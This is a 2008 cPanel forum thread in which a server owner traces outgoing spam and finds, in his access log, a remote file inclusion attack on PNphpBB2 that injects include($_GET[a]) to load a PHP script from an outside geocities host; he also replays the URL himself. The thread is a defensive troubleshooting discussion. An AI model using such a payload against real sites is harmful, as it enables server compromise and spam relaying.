The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

my mail system is being exploited

Discussion in 'E-mail Discussions' started by dukejustice, Mar 7, 2008.

  1. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi.

    My mail system is being exploited to send spam.

    here is a tipical header of a spam sent:
    1JXcwB-0005Ar-CJ-H
    nobody 99 99
    <nobody@machinenumber.mydomain.tld>
    1204897719 0
    -ident nobody
    -received_protocol local
    -body_linecount 49
    -max_received_linelength 97
    -auth_id nobody
    -auth_sender nobody@machinenumber.mydomain.tld
    -allow_unqualified_recipient
    -allow_unqualified_sender
    -deliver_firsttime
    -local
    XX


    As of now, only smtp auth'd people (3 only) send via this server. Plus the php mailer.

    But with the volume that is going out, there must be an exploit of some kind.

    There must be somewhere I can look (logs) to find my information. Where is it? What is it named?

    I need help. Please. My service provider doesn't seem to know about this situation and always tells me I am on VPS and that it's my problem.

    Any help?

    MArc
     
  2. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    I found in /var/log/exim_mainlog this:

    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
    2008-03-07 08:05:46 1JXdCi-0004Za-98 Completed
    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf User 0 set for local_delivery transport is on the never_users list
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf == root@myserver.mydomain.tld <nobody@myserver.mydomain.tld> R=localuser T=local_delivery defer (-29): User 0 set for local_delivery transport is on the never_users list
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
    2008-03-07 08:05:46 1JXdCk-0004aX-OZ <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf Completed
    2008-03-07 08:05:46 1JXdCi-0004Zp-II Completed
    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm Completed
    2008-03-07 08:05:46 1JXdCk-0004aT-Iy <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
    2008-03-07 08:05:47 1JXdCl-0004an-1j <= nobody@myserver.mydomain.tld U=nobody P=local S=1944
    2008-03-07 08:05:47 1JXdCi-0004Zu-PC => ciani79@hotmail.com R=lookuphost T=remote_smtp H=mx3.hotmail.com [65.54.245.72]
    2008-03-07 08:05:47 1JXdCi-0004Zu-PC Completed
    2008-03-07 08:05:47 1JXdCj-0004a9-LU => dave@daveconte.com R=lookuphost T=remote_smtp H=smtp.where.secureserver.net [208.109.80.149]
    2008-03-07 08:05:47 1JXdCj-0004a9-LU Completed
    2008-03-07 08:05:47 1JXdCl-0004at-8M <= nobody@myserver.mydomain.tld U=nobody P=local S=1952
    2008-03-07 08:05:47 1JXdCj-0004aC-Pd => cibbs04@aol.com R=lookuphost T=remote_smtp H=mailin-02.mx.aol.com [64.12.137.89]
    2008-03-07 08:05:47 1JXdCk-0004aL-5D Remote host server30.appriver.com [69.20.116.115] closed connection in response to initial connection
    2008-03-07 08:05:47 1JXdCj-0004aC-Pd Completed
    2008-03-07 08:05:47 1JXdCl-0004ar-9x <= nobody@myserver.mydomain.tld U=nobody P=local S=1934
    2008-03-07 08:05:47 1JXdCl-0004ax-Dh <= nobody@myserver.mydomain.tld U=nobody P=local S=1948
    2008-03-07 08:05:47 1JXdCk-0004aV-EW => cin37@hotmail.com R=lookuphost T=remote_smtp H=mx2.hotmail.com [65.54.245.40]
    2008-03-07 08:05:47 1JXdCk-0004aV-EW Completed
    2008-03-07 08:05:47 1JXdCk-0004aX-OZ ** cin_tom@hotmail.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cin_tom@hotmail.com>: host mx4.hotmail.com [65.54.244.232]: 550 Requested action not taken: mailbox unavailable
    2008-03-07 08:05:47 1JXdCi-0004ZY-Ct => dave@albertbros.com R=lookuphost T=remote_smtp H=mail.albertbros.com [75.145.248.105]
    2008-03-07 08:05:47 1JXdCi-0004ZY-Ct Completed
    2008-03-07 08:05:47 1JXdCl-0004b3-Nk <= nobody@myserver.mydomain.tld U=nobody P=local S=1958
    2008-03-07 08:05:47 1JXdCl-0004an-1j ** cinbad122968@aol.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cinbad122968@aol.com>: host mailin-02.mx.aol.com [64.12.137.89]: 550 We would love to have gotten this email to cinbad122968@aim.com. But, your recipient never logged onto their free AIM Mail account. Please contact them and let them know that they're missing out on all the super features offered by AIM Mail. And by the way, they're also missing out on your email. Thanks.


    but this in no way tells me where these are coming from.

    Marc
     
  3. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    follow up:
    Ratelimit: incoming SMTP connections that do not send QUIT, have recently matched an RBL, or have attacked the server. is checked

    Add sender rates to the mail log [?] is checked

    no rate seems to be enforced unless this problem is caused by a spammer sending quits.

    Still in the dark.

    Marc
     
  4. s.a.

    s.a. Active Member
    PartnerNOC

    Joined:
    Aug 16, 2007
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Toronto, Canada
    Looks like it's your phpmailer.
    Check the access_log for the domain and see who's using the script.
     
  5. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Just did...

    I found out many of these

    127.0.0.1 - - [07/Mar/2008:09:38:13 -0600] "GET /?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%3fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5ba%5d),exit.%2527&a=http://www.geocities.com/d_e_d_d000000f%3f HTTP/1.1" 200 3473

    But that doesn't tell me anything about my problem, except telling me I have a problem.

    I did go to http://www.geocities.com/d_e_d_d_0000000000/id.txt indicated in the url and there is a php script overthere.

    now, I did try that url:
    http://www.mydomain.tld/?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%253fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%252527.include($_GET%255ba%255d),exit.%252527&a=http://www.geocities.com/d_e_d_d_i.3721/id.txt%253f%253f

    and it gives me the page it should give me...

    So there must be some kind of alias somewhere in some table of http that executes code with this command while showing the webpage.

    Any more help with this?

    Regards.

    Marc
     
    #5 dukejustice, Mar 7, 2008
    Last edited by a moderator: Mar 7, 2008
  6. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,475
    Likes Received:
    202
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Yep, lock that account down, it's been compromised. Probably your server as well by the sound of it. Don't wait, go find help.

    My 2
     
Loading...

Share This Page